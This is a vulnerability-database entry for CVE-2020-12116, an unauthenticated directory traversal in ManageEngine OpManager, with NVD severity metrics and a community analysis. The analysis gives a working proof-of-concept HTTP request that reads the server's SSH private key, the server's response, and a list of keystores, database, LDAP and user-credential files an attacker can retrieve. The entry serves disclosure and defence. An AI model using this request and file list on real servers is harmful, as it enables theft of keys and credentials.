Attacker Value
Unknown
CVE-2020-12116
CVE-2020-12116
(Last updated October 06, 2023) ▾
MITRE ATT&CK
Log in to add MITRE ATT&CK tag
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Description
Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
Add Assessment
3
Technical Analysis
Unauthenticated arbitrary file read on ManageEngine OpMange
DESCRIPTION
The latest release of OpManger contains a directory traversal vulnerability that allows unrestricted access to every file in the OpManager application. This includes private SSH keys, password protected Java keystores, and configuration files containing passwords to keystores, private certificates, and the backend database. If LDAP is configured then domain credentials can be obtained from “conf/OpManager/ldap.conf”.
PROOF OF CONCEPT
REQUEST:
GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1 Host: <HOSTNAME>:8060 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Connection: close Cache-Control: max-age=0 Referer: http://<HOSTNAME>:8060/
RESPONSE:
HTTP/1.1 200 Set-Cookie: JSESSIONID=4E221B342BC080BC9AC2D19378364E3B; Path=/; HttpOnly X-FRAME-OPTIONS: DENY Accept-Ranges: bytes ETag: W/"902-1586033949624" Last-Modified: Sat, 04 Apr 2020 20:59:09 GMT Vary: Accept-Encoding Date: Mon, 13 Apr 2020 15:40:01 GMT Connection: close Content-Length: 902 -----BEGIN RSA PRIVATE KEY----- MIICX...pXqnO -----END RSA PRIVATE KEY-----
Here are the files you can read
"bin/.ssh_host_dsa_key", "bin/.ssh_host_dsa_key.pub", "bin/.ssh_host_rsa_key", "bin/.ssh_host_rsa_key.pub", "conf/client.keystore", "conf/customer-config.xml", "conf/database_params.conf", "conf/FirewallAnalyzer/aaa_auth-conf.xml", "conf/FirewallAnalyzer/auth-conf_ppm.xml", "conf/gateway.conf", "conf/itom.truststore", "conf/netflow/auth-conf.xml", "conf/netflow/server.xml", "conf/netflow/ssl_server.xml", "conf/NFAEE/cs_server.xml", "conf/OpManager/database_params.conf", "conf/OpManager/database_params_DE.conf", "conf/OpManager/ldap.conf", "conf/OpManager/MicrosoftSQL/database_params.conf", "conf/OpManager/POSTGRESQL/database_params.conf", "conf/OpManager/POSTGRESQL/database_params_DE.conf", "conf/OpManager/securitydbData.xml", "conf/OpManager/SnmpDefaultProperties.xml", "conf/Oputils/snmp/Community.xml", "conf/Persistence/DBconfig.xml", "conf/Persistence/persistence-configurations.xml", "conf/pmp/PMP_API.conf", "conf/pmp/pmp_server_cert.p12", "conf/product-config.xml", "conf/SANSeed.xml", "conf/server.keystore", "conf/server.xml", "conf/system_properties.conf", "conf/tomcat-users.xml", "lib/OPM_APNS_Cert.p12"
CVSS V3 Severity and Metrics
Data provided by the National Vulnerability Database (NVD)
Base Score:
7.5 High
Impact Score:
3.6
Exploitability Score:
3.9
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
None
Availability (A):
None
General Information
Vendors
- zohocorp
Products
- manageengine opmanager,
- manageengine opmanager 12.4,
- manageengine opmanager 12.5
Hey there, friend, just wanted to say thanks for all the great technical assessments recently. The team’s started looking forward to your evaluations. Much appreciated!